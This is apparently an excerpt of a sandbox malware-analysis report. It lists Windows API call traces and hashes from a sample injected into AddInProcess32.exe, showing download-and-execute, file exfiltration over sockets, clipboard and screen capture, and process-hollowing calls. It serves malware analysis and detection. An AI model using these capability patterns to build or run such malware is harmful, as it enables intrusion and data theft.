                                                      • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Resource$FindLoadLockSizeof
                                                      • String ID: SETTINGS
                                                      • API String ID: 3473537107-594951305
                                                      • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                      • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                      • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                      • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 004096A5
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstH_prologNext
                                                      • String ID:
                                                      • API String ID: 1157919129-0
                                                      • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                      • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                      • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                                      • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 0040884C
                                                      • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                      • String ID:
                                                      • API String ID: 1771804793-0
                                                      • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                      • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                      • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                      • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DownloadExecuteFileShell
                                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                                                      • API String ID: 2825088817-2881483049
                                                      • Opcode ID: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                      • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                      • Opcode Fuzzy Hash: 25f93c1eb8c7c2b3408b92261e90d72d92bad6cdb28d287bebca9ae006ad5217
                                                      • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFind$FirstNextsend
                                                      • String ID: XPG$XPG
                                                      • API String ID: 4113138495-1962359302
                                                      • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                      • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                      • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                                      • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                        • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                                        • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                                        • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateInfoParametersSystemValue
                                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                      • API String ID: 4127273184-3576401099
                                                      • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                      • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                      • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                                      • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                      • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                                      • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                      • String ID:
                                                      • API String ID: 4212172061-0
                                                      • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                      • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                      • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                      • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                      • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID: p'E$JD
                                                      • API String ID: 1084509184-908320845
                                                      • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                      • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                      • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                      • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                                      • String ID:
                                                      • API String ID: 2829624132-0
                                                      • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                      • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                      • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                      • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                      • String ID:
                                                      • API String ID: 1815803762-0
                                                      • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                      • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                      • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                      • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                      APIs
                                                      • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                      • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                      • CloseClipboard.USER32 ref: 0040B760
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$CloseDataOpen
                                                      • String ID:
                                                      • API String ID: 2058664381-0
                                                      • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                      • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                      • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                      • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                      • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID: JD
                                                      • API String ID: 1084509184-2669065882
                                                      • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                      • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                      • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                      • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2299586839-2904428671
                                                      • Opcode ID: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                                      • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                      • Opcode Fuzzy Hash: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                                      • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                                      • String ID:
                                                      • API String ID: 1663032902-0
                                                      • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                      • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                      • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                      • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale_abort_free
                                                      • String ID:
                                                      • API String ID: 2692324296-0
                                                      • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                      • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                      • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                      • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                      APIs
                                                      • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: NameUser
                                                      • String ID:
                                                      • API String ID: 2645101109-0
                                                      • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                      • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                      • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                      • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                      APIs
                                                        • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                      • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                      • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                      • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                      • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                      • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                      • String ID:
                                                      • API String ID: 1084509184-0
                                                      • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                      • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                      • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                      • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                      APIs
                                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                      • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                      • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                      • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                      APIs
                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                        • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                      • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                      • DeleteDC.GDI32(00000000), ref: 00418F65
                                                      • DeleteDC.GDI32(00000000), ref: 00418F68
                                                      • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                      • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                      • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                      • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                      • DeleteObject.GDI32(?), ref: 00419027
                                                      • DeleteObject.GDI32(?), ref: 00419034
                                                      • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                      • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                      • DeleteDC.GDI32(?), ref: 004191B7
                                                      • DeleteDC.GDI32(00000000), ref: 004191BA
                                                      • DeleteObject.GDI32(00000000), ref: 004191BD
                                                      • GlobalFree.KERNEL32(?), ref: 004191C8
                                                      • DeleteObject.GDI32(00000000), ref: 0041927C
                                                      • GlobalFree.KERNEL32(?), ref: 00419283
                                                      • DeleteDC.GDI32(?), ref: 00419293
                                                      • DeleteDC.GDI32(00000000), ref: 0041929E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                      • String ID: DISPLAY
                                                      • API String ID: 479521175-865373369
                                                      • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                      • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                      • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                      • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                      • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                      • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                      • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418328
                                                      • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
